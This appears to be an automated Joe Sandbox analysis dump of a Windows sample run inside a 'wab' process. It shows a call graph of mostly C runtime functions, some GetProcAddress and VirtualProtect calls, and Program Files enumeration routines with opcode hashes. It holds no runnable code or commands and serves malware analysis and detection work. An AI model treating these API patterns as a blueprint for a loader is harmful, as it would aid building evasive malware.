SetStdHandle 7037->7038 7038->7036 7039->7029 7040->6779 7041->6759 7248 371c8a89 7251 371c6d60 7248->7251 7252 371c6d69 7251->7252 7253 371c6d72 7251->7253 7255 371c6c5f 7252->7255 7256 371c5af6 38 API calls 7255->7256 7257 371c6c6c 7256->7257 7258 371c6d7e 38 API calls 7257->7258 7259 371c6c74 7258->7259 7275 371c69f3 7259->7275 7262 371c6c8b 7262->7253 7265 371c6cce 7267 371c571e 20 API calls 7265->7267 7267->7262 7269 371c6cc9 7270 371c6368 20 API calls 7269->7270 7270->7265 7271 371c6d12 7271->7265 7299 371c68c9 7271->7299 7272 371c6ce6 7272->7271 7273 371c571e 20 API calls 7272->7273 7273->7271 7276 371c54a7 38 API calls 7275->7276 7277 371c6a05 7276->7277 7278 371c6a14 GetOEMCP 7277->7278 7279 371c6a26 7277->7279 7281 371c6a3d 7278->7281 7280 371c6a2b GetACP 7279->7280 7279->7281 7280->7281 7281->7262 7282 371c56d0 7281->7282 7283 371c570e 7282->7283 7288 371c56de 7282->7288 7284 371c6368 20 API calls 7283->7284 7286 371c570c 7284->7286 7285 371c56f9 RtlAllocateHeap 7285->7286 7285->7288 7286->7265 7289 371c6e20 7286->7289 7287 371c474f 7 API calls 7287->7288 7288->7283 7288->7285 7288->7287 7290 371c69f3 40 API calls 7289->7290 7291 371c6e3f 7290->7291 7294 371c6e90 IsValidCodePage 7291->7294 7296 371c6e46 7291->7296 7298 371c6eb5 7291->7298 7292 371c2ada 5 API calls 7293 371c6cc1 7292->7293 7293->7269 7293->7272 7295 371c6ea2 GetCPInfo 7294->7295 7294->7296 7295->7296 7295->7298 7296->7292 7302 371c6acb GetCPInfo 7298->7302 7375 371c6886 7299->7375 7301 371c68ed 7301->7265 7303 371c6baf 7302->7303 7309 371c6b05 7302->7309 7306 371c2ada 5 API calls 7303->7306 7308 371c6c5b 7306->7308 7308->7296 7312 371c86e4 7309->7312 7311 371c8a3e 43 API calls 7311->7303 7313 371c54a7 38 API calls 7312->7313 7314 371c8704 MultiByteToWideChar 7313->7314 7316 371c87da 7314->7316 7317 371c8742 7314->7317 7318 371c2ada 5 API calls 7316->7318 7319 371c8763 7317->7319 7320 371c56d0 21 API calls 7317->7320 7321 371c6b66 7318->7321 7322 371c87d4 7319->7322 7324 371c87a8 MultiByteToWideChar 7319->7324 7320->7319 7326 371c8a3e 7321->7326 7331 371c8801 7322->7331 7324->7322 7325 371c87c4 GetStringTypeW 7324->7325 7325->7322 7327 371c54a7 38 API calls 7326->7327 7328 371c8a51 7327->7328 7335 371c8821 7328->7335 7332 371c880d 7331->7332 7333 371c881e 7331->7333 7332->7333 7334 371c571e 20 API calls 7332->7334 7333->7316 7334->7333 7336 371c883c 7335->7336 7337 371c8862 MultiByteToWideChar 7336->7337 7339 371c888c 7337->7339 7349 371c8a16 7337->7349 7338 371c2ada 5 API calls 7340 371c6b87 7338->7340 7341 371c88ad 7339->7341 7344 371c56d0 21 API calls 7339->7344 7340->7311 7342 371c8962 7341->7342 7343 371c88f6 MultiByteToWideChar 7341->7343 7347 371c8801 20 API calls 7342->7347 7343->7342 7345 371c890f 7343->7345 7344->7341 7362 371c5f19 7345->7362 7347->7349 7349->7338 7350 371c8939 7350->7342 7353 371c5f19 11 API calls 7350->7353 7351 371c8971 7352 371c56d0 21 API calls 7351->7352 7355 371c8992 7351->7355 7352->7355 7353->7342 7354 371c8a07 7357 371c8801 20 API calls 7354->7357 7355->7354 7356 371c5f19 11 API calls 7355->7356 7358 371c89e6 7356->7358 7357->7342 7358->7354 7359 371c89f5 WideCharToMultiByte 7358->7359 7359->7354 7360 371c8a35 7359->7360 7361 371c8801 20 API calls 7360->7361 7361->7342 7363 371c5c45 5 API calls 7362->7363 7364 371c5f40 7363->7364 7367 371c5f49 7364->7367 7370 371c5fa1 7364->7370 7368 371c2ada 5 API calls 7367->7368 7369 371c5f9b 7368->7369 7369->7342 7369->7350 7369->7351 7371 371c5c45 5 API calls 7370->7371 7372 371c5fc8 7371->7372 7373 371c2ada 5 API calls 7372->7373 7374 371c5f89 LCMapStringW 7373->7374 7374->7367 7376 371c6892 7375->7376 7383 371c5671 RtlEnterCriticalSection 7376->7383 7378 371c689c 7384 371c68f1 7378->7384 7382 371c68b5 7382->7301 7383->7378 7396 371c7011 7384->7396 7386 371c693f 7387 371c7011 26 API calls 7386->7387 7388 371c695b 7387->7388 7389 371c7011 26 API calls 7388->7389 7390 371c6979 7389->7390 7391 371c68a9 7390->7391 7392 371c571e 20 API calls 7390->7392 7393 371c68bd 7391->7393 7392->7391 7410 371c56b9 RtlLeaveCriticalSection 7393->7410 7395 371c68c7 7395->7382 7397 371c7022 7396->7397 7405 371c701e 7396->7405 7398 371c703c 7397->7398 7399 371c7029 7397->7399 7403 371c706a 7398->7403 7404 371c7073 7398->7404 7398->7405 7400 371c6368 20 API calls 7399->7400 7401 371c702e 7400->7401 7402 371c62ac 26 API calls 7401->7402 7402->7405 7406 371c6368 20 API calls 7403->7406 7404->7405 7407 371c6368 20 API calls 7404->7407 7405->7386 7408 371c706f 7406->7408 7407->7408 7409 371c62ac 26 API calls 7408->7409 7409->7405 7410->7395 7042 371ca945 7044 371ca96d 7042->7044 7043 371ca9a5 7044->7043 7045 371ca99e 7044->7045 7046 371ca997 7044->7046 7055 371caa00 7045->7055 7051 371caa17 7046->7051 7052 371caa20 7051->7052 7059 371cb19b 7052->7059 7056 371caa20 7055->7056 7057 371cb19b 21 API calls 7056->7057 7058 371ca9a3 7057->7058 7060 371cb1da 7059->7060 7065 371cb25c 7060->7065 7069 371cb59e 7060->7069 7062 371cb286 7064 371cb292 7062->7064 7076 371cb8b2 7062->7076 7067 371c2ada 5 API calls 7064->7067 7065->7062 7072 371c78a3 7065->7072 7068 371ca99c 7067->7068 7083 371cb5c1 7069->7083 7073 371c78cb 7072->7073 7074 371c2ada 5 API calls 7073->7074 7075 371c78e8 7074->7075 7075->7062 7077 371cb8bf 7076->7077 7078 371cb8d4 7076->7078 7080 371cb8d9 7077->7080 7081 371c6368 20 API calls 7077->7081 7079 371c6368 20 API calls 7078->7079 7079->7080 7080->7064 7082 371cb8cc 7081->7082 7082->7064 7084 371cb5ec 7083->7084 7085 371cb7e5 RaiseException 7084->7085 7086 371cb5bc 7085->7086 7086->7065 7630 371ca1c6 IsProcessorFeaturePresent 7631 371c7bc7 7632 371c7bd3 7631->7632 7633 371c7c0a 7632->7633 7639 371c5671 RtlEnterCriticalSection 7632->7639 7635 371c7be7 7640 371c7f86 7635->7640 7639->7635 7641 371c7bf7 7640->7641 7642 371c7f94 7640->7642 7644 371c7c10 7641->7644 7642->7641 7647 371c7cc2 7642->7647 7761 371c56b9 RtlLeaveCriticalSection 7644->7761 7646 371c7c17 7646->7633 7649 371c7d42 7647->7649 7650 371c7cd8 7647->7650 7652 371c571e 20 API calls 7649->7652 7674 371c7d90 7649->7674 7650->7649 7656 371c571e 20 API calls 7650->7656 7672 371c7d0b 7650->7672 7651 371c7d9e 7659 371c7dfe 7651->7659 7668 371c571e 20 API calls 7651->7668 7653 371c7d64 7652->7653 7654 371c571e 20 API calls 7653->7654 7657 371c7d77 7654->7657 7655 371c571e 20 API calls 7658 371c7d37 7655->7658 7660 371c7d00 7656->7660 7662 371c571e 20 API calls 7657->7662 7665 371c571e 20 API calls 7658->7665 7666 371c571e 20 API calls 7659->7666 7675 371c90ba 7660->7675 7661 371c571e 20 API calls 7663 371c7d22 7661->7663 7664 371c7d85 7662->7664 7703 371c91b8 7663->7703 7670 371c571e 20 API calls 7664->7670 7665->7649 7671 371c7e04 7666->7671 7668->7651 7670->7674 7671->7641 7672->7661 7673 371c7d2d 7672->7673 7673->7655 7715 371c7e35 7674->7715 7676 371c90cb 7675->7676 7702 371c91b4 7675->7702 7677 371c90dc 7676->7677 7678 371c571e 20 API calls 7676->7678 7679 371c90ee 7677->7679 7680 371c571e 20 API calls 7677->7680 7678->7677 7681 371c9100 7679->7681 7683 371c571e 20 API calls 7679->7683 7680->7679 7682 371c9112 7681->7682 7684 371c571e 20 API calls 7681->7684 7685 371c9124 7682->7685 7686 371c571e 20 API calls 7682->7686 7683->7681 7684->7682 7687 371c9136 7685->7687 7688 371c571e 20 API calls 7685->7688 7686->7685 7689 371c9148 7687->7689 7691 371c571e 20 API calls 7687->7691 7688->7687 7690 371c915a 7689->7690 7692 371c571e 20 API calls 7689->7692 7693 371c571e 20 API calls 7690->7693 7694 371c916c 7690->7694 7691->7689 7692->7690 7693->7694 7695 371c571e 20 API calls 7694->7695 7696 371c917e 7694->7696 7695->7696 7697 371c9190 7696->7697 7699 371c571e 20 API calls 7696->7699 7698 371c91a2 7697->7698 7700 371c571e 20 API calls 7697->7700 7701 371c571e 20 API calls 7698->7701 7698->7702 7699->7697 7700->7698 7701->7702 7702->7672 7704 371c921d 7703->7704 7705 371c91c5 7703->7705 7704->7673 7706 371c91d5 7705->7706 7707 371c571e 20 API calls 7705->7707 7708 371c91e7 7706->7708 7709 371c571e 20 API calls 7706->7709 7707->7706 7710 371c91f9 7708->7710 7711 371c571e 20 API calls 7708->7711 7709->7708 7712 371c920b 7710->7712 7713 371c571e 20 API calls 7710->7713 7711->7710 7712->7704 7714 371c571e 20 API calls 7712->7714 7713->7712 7714->7704 7716 371c7e42 7715->7716 7720 371c7e60 7715->7720 7716->7720 7721 371c925d 7716->7721 7719 371c571e 20 API calls 7719->7720 7720->7651 7722 371c926e 7721->7722 7756 371c7e5a 7721->7756 7757 371c9221 7722->7757 7725 371c9221 20 API calls 7726 371c9281 7725->7726 7727 371c9221 20 API calls 7726->7727 7728 371c928c 7727->7728 7729 371c9221 20 API calls 7728->7729 7730 371c9297 7729->7730 7731 371c9221 20 API calls 7730->7731 7732 371c92a5 7731->7732 7733 371c571e 20 API calls 7732->7733 7734 371c92b0 7733->7734 7735 371c571e 20 API calls 7734->7735 7736 371c92bb 7735->7736 7737 371c571e 20 API calls 7736->7737 7738 371c92c6 7737->7738 7739 371c9221 20 API calls 7738->7739 7740 371c92d4 7739->7740 7741 371c9221 20 API calls 7740->7741 7742 371c92e2 7741->7742 7743 371c9221 20 API calls 7742->7743 7744 371c92f3 7743->7744 7745 371c9221 20 API calls 7744->7745 7746 371c9301 7745->7746 7747 371c9221 20 API calls 7746->7747 7748 371c930f 7747->7748 7749 371c571e 20 API calls 7748->7749 7750 371c931a 7749->7750 7751 371c571e 20 API calls 7750->7751 7752 371c9325 7751->7752 7753 371c571e 20 API calls 7752->7753 7754 371c9330 7753->7754 7755 371c571e 20 API calls 7754->7755 7755->7756 7756->7719 7758 371c9258 7757->7758 7759 371c9248 7757->7759 7758->7725 7759->7758 7760 371c571e 20 API calls 7759->7760 7760->7759 7761->7646 7087 371c8640 7090 371c8657 7087->7090 7091 371c8679 7090->7091 7092 371c8665 7090->7092 7094 371c8681 7091->7094 7095 371c8693 7091->7095 7093 371c6368 20 API calls 7092->7093 7096 371c866a 7093->7096 7097 371c6368 20 API calls 7094->7097 7102 371c8652 7095->7102 7103 371c54a7 7095->7103 7100 371c62ac 26 API calls 7096->7100 7098 371c8686 7097->7098 7101 371c62ac 26 API calls 7098->7101 7100->7102 7101->7102 7104 371c54ba 7103->7104 7105 371c54c4 7103->7105 7104->7102 7105->7104 7106 371c5af6 38 API calls 7105->7106 7107 371c54e5 7106->7107 7108 371c7a00 38 API calls 7107->7108 7109 371c54fe 7108->7109 7111 371c7a2d 7109->7111 7112 371c7a55 7111->7112 7113 371c7a40 7111->7113 7112->7104 7113->7112 7115 371c6d7e 7113->7115 7116 371c6d8a 7115->7116 7117 371c5af6 38 API calls 7116->7117 7119 371c6d94 7117->7119 7120 371c6e18 7119->7120 7122 371c55a8 38 API calls 7119->7122 7123 371c571e 20 API calls 7119->7123 7124 371c5671 RtlEnterCriticalSection 7119->7124 7125 371c6e0f 7119->7125 7120->7112 7122->7119 7123->7119 7124->7119 7128 371c56b9 RtlLeaveCriticalSection 7125->7128 7127 371c6e16 7127->7119 7128->7127 7415 371c7a80 7416 371c7a8d 7415->7416 7417 371c637b 20 API calls 7416->7417 7418 371c7aa7 7417->7418 7419 371c571e 20 API calls 7418->7419 7420 371c7ab3 7419->7420 7421 371c637b 20 API calls 7420->7421 7424 371c7ad9 7420->7424 7423 371c7acd 7421->7423 7422 371c5eb7 11 API calls 7422->7424 7425 371c571e 20 API calls 7423->7425 7424->7422 7426 371c7ae5 7424->7426 7425->7424 6535 371c5303 6538 371c50a5 6535->6538 6547 371c502f 6538->6547 6541 371c502f 5 API calls 6542 371c50c3 6541->6542 6551 371c5000 6542->6551 6545 371c5000 20 API calls 6546 371c50d9 6545->6546 6548 371c5048 6547->6548 6549 371c2ada 5 API calls 6548->6549 6550 371c5069 6549->6550 6550->6541 6555 371c500d 6551->6555 6556 371c502a 6551->6556 6552 371c5024 6554 371c571e 20 API calls 6552->6554 6553 371c571e 20 API calls 6553->6555 6554->6556 6555->6552 6555->6553 6556->6545 6557 371c7103 GetCommandLineA GetCommandLineW 7129 371caf43 7130 371caf4d 7129->7130 7131 371caf59 7129->7131 7130->7131 7132 371caf52 CloseHandle 7130->7132 7132->7131 6558 371c543d 6559 371c5440 6558->6559 6562 371c55a8 6559->6562 6573 371c7613 6562->6573 6565 371c55c2 IsProcessorFeaturePresent 6567 371c55cd 6565->6567 6570 371c60e2 8 API calls 6567->6570 6569 371c55b8 6569->6565 6572 371c55e0 6569->6572 6570->6572 6603 371c4bc1 6572->6603 6606 371c7581 6573->6606 6576 371c766e 6577 371c767a 6576->6577 6578 371c5b7a 20 API calls 6577->6578 6580 371c76a1 6577->6580 6583 371c76a7 6577->6583 6578->6580 6579 371c76f3 6581 371c6368 20 API calls 6579->6581 6580->6579 6580->6583 6586 371c76d6 6580->6586 6582 371c76f8 6581->6582 6584 371c62ac 26 API calls 6582->6584 6592 371c771f 6583->6592 6620 371c5671 RtlEnterCriticalSection 6583->6620 6584->6586 6585 371cbdc9 5 API calls 6588 371c7875 6585->6588 6586->6585 6588->6569 6591 371c777e 6600 371c77a9 6591->6600 6622 371c7665 6591->6622 6592->6591 6593 371c7776 6592->6593 6592->6600 6621 371c56b9 RtlLeaveCriticalSection 6592->6621 6594 371c4bc1 28 API calls 6593->6594 6594->6591 6599 371c7665 38 API calls 6599->6600 6625 371c782e 6600->6625 6601 371c780c 6601->6586 6602 371c5af6 38 API calls 6601->6602 6602->6586 6604 371c499b 28 API calls 6603->6604 6605 371c4bd2 6604->6605 6609 371c7527 6606->6609 6608 371c55ad 6608->6569 6608->6576 6610 371c7533 6609->6610 6615 371c5671 RtlEnterCriticalSection 6610->6615 6612 371c7541 6616 371c7575 6612->6616 6614 371c7568 6614->6608 6615->6612 6619 371c56b9 RtlLeaveCriticalSection 6616->6619 6618 371c757f 6618->6614 6619->6618 6620->6592 6621->6593 6623 371c5af6 38 API calls 6622->6623 6624 371c766a 6623->6624 6624->6599 6626 371c77fd 6625->6626 6627 371c7834 6625->6627 6626->6586 6626->6601 6629 371c5af6 GetLastError 6626->6629 6649 371c56b9 RtlLeaveCriticalSection 6627->6649 6630 371c5b0c 6629->6630 6631 371c5b12 6629->6631 6633 371c5e08 11 API calls 6630->6633 6632 371c637b 20 API calls 6631->6632 6636 371c5b61 SetLastError 6631->6636 6634 371c5b24 6632->6634 6633->6631 6635 371c5b2c 6634->6635 6637 371c5e5e 11 API calls 6634->6637 6638 371c571e 20 API calls 6635->6638 6636->6601 6639 371c5b41 6637->6639 6640 371c5b32 6638->6640 6639->6635 6641 371c5b48 6639->6641 6642 371c5b6d SetLastError 6640->6642 6643 371c593c 20 API calls 6641->6643 6644 371c55a8 35 API calls 6642->6644 6645 371c5b53 6643->6645 6646 371c5b79 6644->6646 6647 371c571e 20 API calls 6645->6647 6648 371c5b5a 6647->6648 6648->6636 6648->6642 6649->6626 7427 371c67bf 7432 371c67f4 7427->7432 7430 371c67db 7431 371c571e 20 API calls 7431->7430 7433 371c6806 7432->7433 7434 371c67cd 7432->7434 7435 371c680b 7433->7435 7436 371c6836 7433->7436 7434->7430 7434->7431 7437 371c637b 20 API calls 7435->7437 7436->7434 7443 371c71d6 7436->7443 7438 371c6814 7437->7438 7440 371c571e 20 API calls 7438->7440 7440->7434 7441 371c6851 7442 371c571e 20 API calls 7441->7442 7442->7434 7444 371c71e1 7443->7444 7445 371c7209 7444->7445 7446 371c71fa 7444->7446 7448 371c7218 7445->7448 7452 371c8a98 7445->7452 7449 371c6368 20 API calls 7446->7449 7459 371c8acb 7448->7459 7451 371c71ff 7449->7451 7451->7441 7453 371c8ab8 RtlSizeHeap 7452->7453 7454 371c8aa3 7452->7454 7453->7448 7455 371c6368 20 API calls 7454->7455 7456 371c8aa8 7455->7456 7457 371c62ac 26 API calls 7456->7457 7458 371c8ab3 7457->7458 7458->7448 7460 371c8ad8 7459->7460 7461 371c8ae3 7459->7461 7462 371c56d0 21 API calls 7460->7462 7463 371c8aeb 7461->7463 7469 371c8af4 7461->7469 7467 371c8ae0 7462->7467 7464 371c571e 20 API calls 7463->7464 7464->7467 7465 371c8b1e RtlReAllocateHeap 7465->7467 7465->7469 7466 371c8af9 7468 371c6368 20 API calls 7466->7468 7467->7451 7468->7467 7469->7465 7469->7466 7470 371c474f 7 API calls 7469->7470 7470->7469 7762 371c5bff 7770 371c5d5c 7762->7770 7765 371c5b7a 20 API calls 7766 371c5c1b 7765->7766 7767 371c5c28 7766->7767 7768 371c5c2b 11 API calls 7766->7768 7769 371c5c13 7768->7769 7771 371c5c45 5 API calls 7770->7771 7772 371c5d83 7771->7772 7773 371c5d9b TlsAlloc 7772->7773 7774 371c5d8c 7772->7774 7773->7774 7775 371c2ada 5 API calls 7774->7775 7776 371c5c09 7775->7776 7776->7765 7776->7769 6650 371c5630 6652 371c563b 6650->6652 6653 371c5664 6652->6653 6654 371c5660 6652->6654 6656 371c5eb7 6652->6656 6663 371c5688 6653->6663 6657 371c5c45 5 API calls 6656->6657 6658 371c5ede 6657->6658 6659 371c5efc InitializeCriticalSectionAndSpinCount 6658->6659 6660 371c5ee7 6658->6660 6659->6660 6661 371c2ada 5 API calls 6660->6661 6662 371c5f13 6661->6662 6662->6652 6664 371c56b4 6663->6664 6665 371c5695 6663->6665 6664->6654 6666 371c569f RtlDeleteCriticalSection 6665->6666 6666->6664 6666->6666 7133 371c3370 7144 371c3330 7133->7144 7145 371c334f 7144->7145 7146 371c3342 7144->7146 7147 371c2ada 5 API calls 7146->7147 7147->7145 7777 371c63f0 7778 371c6400 7777->7778 7782 371c6416 7777->7782 7779 371c6368 20 API calls 7778->7779 7780 371c6405 7779->7780 7781 371c62ac 26 API calls 7780->7781 7791 371c640f 7781->7791 7788 371c6561 7782->7788 7789 371c6480 7782->7789 7796 371c6580 7782->7796 7783 371c4e76 20 API calls 7784 371c64e5 7783->7784 7786 371c64ee 7784->7786 7793 371c6573 7784->7793 7807 371c85eb 7784->7807 7787 371c571e 20 API calls 7786->7787 7787->7788 7816 371c679a 7788->7816 7789->7783 7794 371c62bc 11 API calls 7793->7794 7795 371c657f 7794->7795 7797 371c658c 7796->7797 7797->7797 7798 371c637b 20 API calls 7797->7798 7799 371c65ba 7798->7799 7800 371c85eb 26 API calls 7799->7800 7801 371c65e6 7800->7801 7802 371c62bc 11 API calls 7801->7802 7803 371c6615 7802->7803 7804 371c66b6 FindFirstFileExA 7803->7804 7805 371c6705 7804->7805 7806 371c6580 26 API calls 7805->7806 7808 371c853a 7807->7808 7809 371c854f 7808->7809 7810 371c8554 7808->7810 7814 371c858b 7808->7814 7809->7810 7811 371c6368 20 API calls 7809->7811 7810->7784 7812 371c857a 7811->7812 7813 371c62ac 26 API calls 7812->7813 7813->7810 7814->7810 7815 371c6368 20 API calls 7814->7815 7815->7812 7817 371c67a4 7816->7817 7818 371c67b4 7817->7818 7819 371c571e 20 API calls 7817->7819 7820 371c571e 20 API calls 7818->7820 7819->7817 7821 371c67bb 7820->7821 7821->7791 7148 371c9e71 7149 371c9e95 7148->7149 7150 371cac6b 7149->7150 7152 371c9eae 7149->7152 7155 371cacad 7150->7155 7166 371cb2f0 7150->7166 7151 371c9ef8 7152->7151 7156 371caa53 7152->7156 7157 371caa70 RtlDecodePointer 7156->7157 7159 371caa80 7156->7159 7157->7159 7158 371c2ada 5 API calls 7161 371cac67 7158->7161 7160 371cab0d 7159->7160 7162 371cab02 7159->7162 7164 371caab7 7159->7164 7160->7162 7163 371c6368 20 API calls 7160->7163 7161->7151 7162->7158 7163->7162 7164->7162 7165 371c6368 20 API calls 7164->7165 7165->7162 7167 371cb329 7166->7167 7168 371cb5c1 RaiseException 7167->7168 7169 371cb350 7167->7169 7168->7169 7170 371cb393 7169->7170 7172 371cb36e 7169->7172 7171 371cb8b2 20 API calls 7170->7171 7174 371cb38e 7171->7174 7177 371cb8e1 7172->7177 7175 371c2ada 5 API calls 7174->7175 7176 371cb3b7 7175->7176 7176->7155 7178 371cb8f0 7177->7178 7179 371cb90f 7178->7179 7180 371cb964 7178->7180 7181 371c78a3 5 API calls 7179->7181 7182 371cb8b2 20 API calls 7180->7182 7183 371cb950 7181->7183 7185 371cb95d 7182->7185 7184 371cb8b2 20 API calls 7183->7184 7183->7185 7184->7185 7185->7174 7475 371c3eb3 7476 371c5411 38 API calls 7475->7476 7477 371c3ebb 7476->7477 7478 371c60ac 7479 371c60b7 7478->7479 7481 371c60dd 7478->7481 7480 371c60c7 FreeLibrary 7479->7480 7479->7481 7480->7479 7186 371c506f 7187 371c5087 7186->7187 7188 371c5081 7186->7188 7189 371c5000 20 API calls 7188->7189 7189->7187 6667 371c742b 6668 371c7430 6667->6668 6670 371c7453 6668->6670 6671 371c8bae 6668->6671 6672 371c8bbb 6671->6672 6673 371c8bdd 6671->6673 6674 371c8bc9 RtlDeleteCriticalSection 6672->6674 6675 371c8bd7 6672->6675 6673->6668 6674->6674 6674->6675 6676 371c571e 20 API calls 6675->6676 6676->6673 7190 371cac6b 7191 371cac84 7190->7191 7192 371cb2f0 21 API calls 7191->7192 7193 371cacad 7191->7193 7192->7193 6024 371cc7a7 6025 371cc7be 6024->6025 6031 371cc82c 6024->6031 6025->6031 6036 371cc7e6 GetModuleHandleA 6025->6036 6026 371cc835 GetModuleHandleA 6029 371cc83f 6026->6029 6027 371cc872 6029->6029 6029->6031 6032 371cc85f GetProcAddress 6029->6032 6030 371cc7dd 6030->6029 6030->6031 6033 371cc800 GetProcAddress 6030->6033 6031->6026 6031->6027 6031->6029 6032->6031 6033->6031 6034 371cc80d VirtualProtect 6033->6034 6034->6031 6035 371cc81c VirtualProtect 6034->6035 6035->6031 6037 371cc7ef 6036->6037 6038 371cc82c 6036->6038 6048 371cc803 GetProcAddress 6037->6048 6040 371cc835 GetModuleHandleA 6038->6040 6041 371cc872 6038->6041 6047 371cc83f 6038->6047 6040->6047 6042 371cc7f4 6042->6038 6043 371cc800 GetProcAddress 6042->6043 6043->6038 6044 371cc80d VirtualProtect 6043->6044 6044->6038 6045 371cc81c VirtualProtect 6044->6045 6045->6038 6046 371cc85f GetProcAddress 6046->6038 6047->6038 6047->6046 6049 371cc82c 6048->6049 6050 371cc80d VirtualProtect 6048->6050 6052 371cc835 GetModuleHandleA 6049->6052 6053 371cc872 6049->6053 6050->6049 6051 371cc81c VirtualProtect 6050->6051 6051->6049 6055 371cc83f 6052->6055 6054 371cc85f GetProcAddress 6054->6055 6055->6049 6055->6054 7194 371c7260 GetStartupInfoW 7195 371c7318 7194->7195 7196 371c7286 7194->7196 7196->7195 7200 371c8be3 7196->7200 7198 371c72af 7198->7195 7199 371c72dd GetFileType 7198->7199 7199->7198 7201 371c8bef 7200->7201 7202 371c8bfc 7201->7202 7203 371c8c13 7201->7203 7204 371c6368 20 API calls 7202->7204 7213 371c5671 RtlEnterCriticalSection 7203->7213 7206 371c8c01 7204->7206 7207 371c62ac 26 API calls 7206->7207 7209 371c8c0b 7207->7209 7208 371c8c4b 7221 371c8c72 7208->7221 7209->7198 7210 371c8c1f 7210->7208 7214 371c8b34 7210->7214 7213->7210 7215 371c637b 20 API calls 7214->7215 7217 371c8b46 7215->7217 7216 371c8b53 7218 371c571e 20 API calls 7216->7218 7217->7216 7219 371c5eb7 11 API calls 7217->7219 7220 371c8ba5 7218->7220 7219->7217 7220->7210 7224 371c56b9 RtlLeaveCriticalSection 7221->7224 7223 371c8c79 7223->7209 7224->7223 7482 371c81a0 7483 371c81d9 7482->7483 7484 371c81dd 7483->7484 7495 371c8205 7483->7495 7485 371c6368 20 API calls 7484->7485 7487 371c81e2 7485->7487 7486 371c8529 7488 371c2ada 5 API calls 7486->7488 7489 371c62ac 26 API calls 7487->7489 7490 371c8536 7488->7490 7491 371c81ed 7489->7491 7492 371c2ada 5 API calls 7491->7492 7494 371c81f9 7492->7494 7495->7486 7496 371c80c0 7495->7496 7497 371c80db 7496->7497 7498 371c2ada 5 API calls 7497->7498 7499 371c8152 7498->7499 7499->7495 7822 371ca1e0 7825 371ca1fe 7822->7825 7824 371ca1f6 7829 371ca203 7825->7829 7826 371caa53 21 API calls 7828 371ca42f 7826->7828 7827 371ca298 7827->7824 7828->7824 7829->7826 7829->7827 7225 371c9d61 7226 371c9d81 7225->7226 7229 371c9db8 7226->7229 7228 371c9dab 7230 371c9dbf 7229->7230 7231 371c9e20 7230->7231 7233 371c9ddf 7230->7233 7232 371caa17 21 API calls 7231->7232 7234 371ca90e 7231->7234 7235 371c9e6e 7232->7235 7233->7234 7236 371caa17 21 API calls 7233->7236 7234->7228 7235->7228 7237 371ca93e 7236->7237 7237->7228 7500 371c21a1 7503 371c2418 7500->7503 7504 371c2420 7503->7504 7507 371c47f5 7504->7507 7506 371c21bc 7508 371c4808 7507->7508 7509 371c4804 7507->7509 7512 371c4815 7508->7512 7509->7506 7513 371c5b7a 20 API calls 7512->7513 7516 371c482c 7513->7516 7514 371c2ada 5 API calls 7515 371c4811 7514->7515 7515->7506 7516->7514

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 371C1137
                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 371C1151
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 371C115C
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 371C116D
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 371C117C
                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 371C1193
                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 371C11D0
                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 371C11DB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1083526818-0
                                                                                                                                                • Opcode ID: fbf100b9071f8e29af4aa6a0622725f2d14abb1a9a622c494ab76510b3bce878
                                                                                                                                                • Instruction ID: c4d05dc85c675717e9294314f4db849cf291620cc93121166fe75b007187eec6
                                                                                                                                                • Opcode Fuzzy Hash: fbf100b9071f8e29af4aa6a0622725f2d14abb1a9a622c494ab76510b3bce878
                                                                                                                                                • Instruction Fuzzy Hash: 3D21A5735443096BD710EAB49C49F9B7B9CEF84324F00092AF998E3190EB38E6158796
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 371C1434
                                                                                                                                                  • Part of subcall function 371C10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 371C1137
                                                                                                                                                  • Part of subcall function 371C10F1: lstrcatW.KERNEL32(?,?), ref: 371C1151
                                                                                                                                                  • Part of subcall function 371C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 371C115C
                                                                                                                                                  • Part of subcall function 371C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 371C116D
                                                                                                                                                  • Part of subcall function 371C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 371C117C
                                                                                                                                                  • Part of subcall function 371C10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 371C1193
                                                                                                                                                  • Part of subcall function 371C10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 371C11D0
                                                                                                                                                  • Part of subcall function 371C10F1: FindClose.KERNELBASE(00000000), ref: 371C11DB
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 371C14C5
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 371C14E0
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 371C150F
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 371C1521
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 371C1547
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 371C1553
